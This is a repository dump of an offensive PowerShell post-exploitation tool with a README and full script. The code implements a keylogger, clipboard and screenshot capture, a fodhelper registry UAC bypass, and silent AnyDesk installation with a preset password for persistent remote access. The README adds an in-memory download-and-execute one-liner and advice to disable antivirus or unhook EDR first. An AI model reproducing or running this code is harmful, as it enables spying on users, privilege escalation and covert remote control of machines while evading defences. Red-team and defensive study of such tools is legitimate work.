├── usage.gif ├── LICENSE ├── README.md └── Infiltrax.ps1 /usage.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alexdhital/Infiltrax/HEAD/usage.gif -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 Alex Dhital 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Infiltrax 2 | Infiltrax is a post-exploitation reconnaissance tool for penetration testers and red teams, designed to capture screenshots, retrieve clipboard contents, log keystrokes, bypass UAC and install AnyDesk for persistent remote access. 3 | 4 | ![Infiltrax](https://raw.githubusercontent.com/alexdhital/Infiltrax/main/usage.gif) 5 | 6 | ## Features 7 | 8 | - **Screenshot Capture**: Take screenshots of the entire screen and save them as PNG files. 9 | - **Clipboard Retrieval**: Access the current clipboard contents. 10 | - **Keystroke Logging**: Record keystrokes for a specified duration. 11 | - **UAC Bypass**: Bypasses UAC via fodhelper.exe 12 | - **AnyDesk Installation**: Install and configure AnyDesk with unattended access. 13 | 14 | ## Usage 15 | 1. **Execute directly into memory** 16 | ```powershell 17 | C:\Users\Administrator\Desktop> IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/alexdhital/Infiltrax/main/Infiltrax.ps1') 18 | ``` 19 | 2. **Get Clipboard contents** 20 | ```powershell 21 | C:\Users\Administrator\Desktop> Invoke-Clipboard 22 | ``` 23 | 3. **Take desktop screenshot and save into certain location** 24 | ```powershell 25 | C:\Users\Administrator\Desktop> Invoke-Screenshot -Path "C:\Windows\Tasks\" 26 | ``` 27 | 4. **Capture user keystrokes and save in a file** 28 | ```powershell 29 | C:\Users\Administrator\Desktop> Invoke-KeyStrokeCapture -DurationInSeconds 30 -OutputPath C:\Users\Vlex\Desktop\keystrokes.txt 30 | ``` 31 | 5. **Bypass UAC to run any program in elevated context. Default program powershell.exe** 32 | 33 | This function is taken from https://gist.github.com/netbiosX/a114f8822eb20b115e33db55deee6692 all credit goes to netbiosX :). Spawnning cmd.exe or powersell.exe from script gets caught by behavioural 34 | detection disable defender or unhook EDR first. 35 | ```powershell 36 | C:\Users\Vlex\Desktop> Invoke-FodHelperBypass -program "calc.exe" 37 | ``` 38 | 6. **Installs anydesk silently, sets up unattended access and gets remote id** (Requires Administrative Privilege) 39 | ```powershell 40 | C:\Users\Administrator\Desktop> Invoke-AnyDeskInstall -InstallPath "C:\Users\Alex\AppData\Local\AnyDesk" -Password "Unattended123!" 41 | ``` 42 | ## Warning and Legal Notice 43 | This tool is intended solely for use by penetration testers and red team professionals during authorized engagements during post exploitation. Do not use this tool for unauthorized access or illegal activities. 44 | -------------------------------------------------------------------------------- /Infiltrax.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | 3 | Infiltrax File: Infiltrax.ps1 4 | Author: Alex Dhital 5 | License: MIT License 6 | Required Dependencies: None 7 | 8 | #> 9 | function Invoke-Clipboard { 10 | 11 | <# 12 | .SYNOPSIS 13 | 14 | Simply gets the raw clipboard contents via Get-Clipboard powershell cmdlet hehe sry no sry 15 | 16 | #> 17 | try { 18 | Get-Clipboard -Raw 19 | } 20 | catch { 21 | 22 | Write-Output "Error something went wrong" 23 | } 24 | 25 | } 26 | 27 | function Invoke-Screenshot { 28 | 29 | Param( 30 | [Parameter(Mandatory = $true)][string]$Path 31 | ) 32 | 33 | try { 34 | $FileName = "$env:COMPUTERNAME - $(get-date -f yyyy-MM-dd_HHmmss).png" 35 | $File = Join-Path $Path $FileName 36 | Add-Type -AssemblyName System.Windows.Forms 37 | Add-Type -AssemblyName System.Drawing 38 | 39 | $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen 40 | $Width = $Screen.Width 41 | $Height = $Screen.Height 42 | $Left = $Screen.Left 43 | $Top = $Screen.Top 44 | 45 | $bitmap = New-Object System.Drawing.Bitmap $Width, $Height 46 | $graphic = [System.Drawing.Graphics]::FromImage($bitmap) 47 | $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size) 48 | 49 | $bitmap.Save($File, [System.Drawing.Imaging.ImageFormat]::Png) 50 | Write-Output "Screenshot saved to: $File" 51 | } 52 | catch { 53 | Write-Error "Failed to save screenshot. Error: $_" 54 | } 55 | finally { 56 | 57 | if ($graphic) { $graphic.Dispose() } 58 | if ($bitmap) { $bitmap.Dispose() } 59 | } 60 | } 61 | 62 | function Invoke-KeyStrokeCapture { 63 | <# 64 | 65 | .DESCRIPTION 66 | Uses GetAsyncKeyState function from user32.dll to map key presses including special characters and appends them to specified file. 67 | 68 | #> 69 | 70 | param( 71 | [Parameter(Mandatory = $true)][int]$DurationInSeconds, 72 | [Parameter(Mandatory = $true)][string]$OutputPath 73 | ) 74 | 75 | $signatures = @" 76 | [DllImport("user32.dll")] 77 | public static extern short GetAsyncKeyState(int vKey); 78 | "@ 79 | $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru 80 | 81 | $null = New-Item -Path $OutputPath -ItemType File -Force 82 | 83 | $endTime = (Get-Date).AddSeconds($DurationInSeconds) 84 | 85 | $keyCodes = @{ 86 | 8 = "`b" # backspace 87 | 13 = "`r`n" # enter 88 | 32 = " " # space 89 | 9 = "`t" # tab 90 | 46 = "DEL" # delete 91 | } 92 | 93 | $shiftKeyMapping = @{ 94 | 48 = ")" # for shift + 0 95 | 49 = "!" # for shift + 1 96 | 50 = "@" # for shift + 2 97 | 51 = "#" # for shift + 3 98 | 52 = "$" # for shift + 4 99 | 53 = "%" # for shift + 5 100 | 54 = "^" # for shift + 6 101 | 55 = "&" # for shift + 7 102 | 56 = "*" # for shift + 8 103 | 57 = "(" # for shift + 9 104 | } 105 | 106 | $nonPrintableKeys = @{ 107 | 27 = "ESC" # escape 108 | 33 = "PGUP" # page up 109 | 34 = "PGDN" # page down 110 | 35 = "END" # end 111 | 36 = "HOME" # home 112 | 37 = "LEFT" # left arrow 113 | 38 = "UP" # up arrow 114 | 39 = "RIGHT" # right arrow 115 | 40 = "DOWN" # down arrow 116 | } 117 | 118 | $previousState = @{} 119 | $modifiers = @{ 120 | 16 = $false # left shift 121 | 160 = $false # right shift 122 | 17 = $false # ctrl 123 | 18 = $false # alt 124 | } 125 | 126 | function Get-Character { 127 | param ( 128 | [int]$keyCode 129 | ) 130 | 131 | if ($modifiers[16] -or $modifiers[160]) { 132 | if ($shiftKeyMapping.ContainsKey($keyCode)) { 133 | return $shiftKeyMapping[$keyCode] 134 | } 135 | } 136 | 137 | if ($keyCode -ge 32 -and $keyCode -le 126) { 138 | return [char]$keyCode 139 | } 140 | 141 | if ($nonPrintableKeys.ContainsKey($keyCode)) { 142 | return $nonPrintableKeys[$keyCode] 143 | } 144 | 145 | return "" 146 | } 147 | 148 | Write-Host -NoNewline "Capturing keystrokes: " 149 | 150 | while ((Get-Date) -lt $endTime) { 151 | Start-Sleep -Milliseconds 50 152 | 153 | for ($keyCode = 8; $keyCode -le 255; $keyCode++) { 154 | $keyState = $API::GetAsyncKeyState($keyCode) 155 | $isPressed = ($keyState -band 0x8000) -ne 0 156 | 157 | if ($keyCode -eq 16 -or $keyCode -eq 160) { 158 | $modifiers[$keyCode] = $isPressed 159 | } elseif ($keyCode -eq 17 -or $keyCode -eq 18) { 160 | $modifiers[$keyCode] = $isPressed 161 | } elseif ($isPressed -and (-not $previousState[$keyCode])) { 162 | $character = Get-Character -keyCode $keyCode 163 | [System.IO.File]::AppendAllText($OutputPath, $character, [System.Text.Encoding]::ASCII) 164 | 165 | # Append the keystroke to the same line in the console 166 | Write-Host -NoNewline $character 167 | 168 | $previousState[$keyCode] = $true 169 | } elseif (-not $isPressed) { 170 | if ($previousState.ContainsKey($keyCode)) { 171 | $previousState.Remove($keyCode) 172 | } 173 | } 174 | } 175 | } 176 | 177 | Write-Host "`nKeystroke logging completed. Output saved to $OutputPath" 178 | } 179 | 180 | function Invoke-AnyDeskInstall { 181 | param ( 182 | [Parameter(Mandatory = $true)] 183 | [string]$InstallPath, 184 | 185 | [Parameter(Mandatory = $true)] 186 | [string]$Password, 187 | 188 | [string]$AnyDeskURL = "https://download.anydesk.com/AnyDesk.exe", 189 | [string]$DestinationPath = "C:\Windows\Tasks\AnyDesk.exe" 190 | ) 191 | 192 | function Test-AdminAccess { 193 | $currentIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent() 194 | $principal = New-Object System.Security.Principal.WindowsPrincipal($currentIdentity) 195 | return $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator) 196 | } 197 | 198 | function Download-And-Install-AnyDesk { 199 | 200 | New-Item -ItemType Directory -Path (Split-Path -Parent $DestinationPath) -Force -ErrorAction SilentlyContinue 201 | 202 | Write-Output "Downloading AnyDesk from $AnyDeskURL to $DestinationPath" 203 | Start-BitsTransfer -Source $AnyDeskURL -Destination $DestinationPath 204 | 205 | New-Item -ItemType Directory -Path $InstallPath -Force -ErrorAction SilentlyContinue 206 | 207 | try { 208 | Write-Output "Installing AnyDesk to $InstallPath" 209 | Start-Process -FilePath $DestinationPath -ArgumentList "--install `"$InstallPath`" --start-with-win --silent" -Wait 210 | } 211 | catch { 212 | Write-Output "Error Occurred! Could not install AnyDesk to $InstallPath." 213 | } 214 | 215 | Start-Sleep -Seconds 5 216 | 217 | try { 218 | Remove-Item $DestinationPath -Force 219 | } catch { 220 | Write-Output "Failed to remove file: $_" 221 | } 222 | } 223 | 224 | function Find-AnyDeskPath { 225 | $possiblePaths = @( 226 | "C:\Program Files\AnyDesk\AnyDesk.exe", 227 | "C:\Program Files (x86)\AnyDesk\AnyDesk.exe", 228 | "$InstallPath\AnyDesk.exe" 229 | ) 230 | 231 | foreach ($path in $possiblePaths) { 232 | if (Test-Path $path) { 233 | return $path 234 | } 235 | } 236 | 237 | return $null 238 | } 239 | 240 | function Setup-UnattendedAccess { 241 | $anyDeskPath = Find-AnyDeskPath 242 | if ($anyDeskPath) { 243 | Write-Output "Setting password..." 244 | Start-Process -FilePath $anyDeskPath -ArgumentList "--set-password $Password" -Wait 245 | 246 | $stdoutPath = "C:\Windows\Tasks\id.txt" 247 | Write-Output "Getting AnyDesk ID..." 248 | Start-Process -FilePath $anyDeskPath -ArgumentList "--get-id" -RedirectStandardOutput $stdoutPath -NoNewWindow -Wait 249 | 250 | if (Test-Path $stdoutPath) { 251 | $id = Get-Content $stdoutPath 252 | Write-Output "AnyDesk ID is: $id" 253 | Remove-Item $stdoutPath -ErrorAction SilentlyContinue 254 | } else { 255 | Write-Output "Failed to retrieve AnyDesk ID. Output file not found." 256 | } 257 | } else { 258 | Write-Output "AnyDesk executable not found. Unattended access setup aborted." 259 | } 260 | } 261 | 262 | function Check-AnyDeskInstallation { 263 | $anydesk = Get-Package -Name AnyDesk -ErrorAction SilentlyContinue 264 | if ($anydesk) { 265 | Write-Output "AnyDesk is already installed. Version: $($anydesk.Version)" 266 | } else { 267 | Write-Output "AnyDesk is not installed. Installing now..." 268 | Download-And-Install-AnyDesk 269 | } 270 | 271 | Setup-UnattendedAccess 272 | } 273 | 274 | if (-not (Test-AdminAccess)) { 275 | Write-Output "This function requires Administrative access." 276 | return 277 | } 278 | 279 | Check-AnyDeskInstallation 280 | } 281 | 282 | function Invoke-FodHelperBypass { 283 | 284 | <# 285 | .SYPNOSIS 286 | 287 | Bypasses UAC via fodhelper.exe to run powershell process in elevated session. 288 | This function is taken from https://gist.github.com/netbiosX/a114f8822eb20b115e33db55deee6692 who is the original author. 289 | 290 | .NOTES 291 | 292 | File Name: Infiltrax.ps1 293 | Original function Author: netbiosX. - pentestlab.blog 294 | Spawnning powershell or cmd from script gets caught by behavioural detection. Disable Real Time protection or unhook EDR first 295 | 296 | #> 297 | 298 | Param ( 299 | 300 | [String]$program = "cmd /c start powershell.exe" 301 | ) 302 | 303 | New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force 304 | New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force 305 | Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force 306 | 307 | Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden 308 | 309 | Start-Sleep 3 310 | Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force 311 | 312 | } 313 | # To do: adding screen recording functionality probably? 314 | 315 | 316 | 317 | 318 | 319 | 320 | 321 | 322 | 323 | 324 | 325 | 326 | 327 | 328 | --------------------------------------------------------------------------------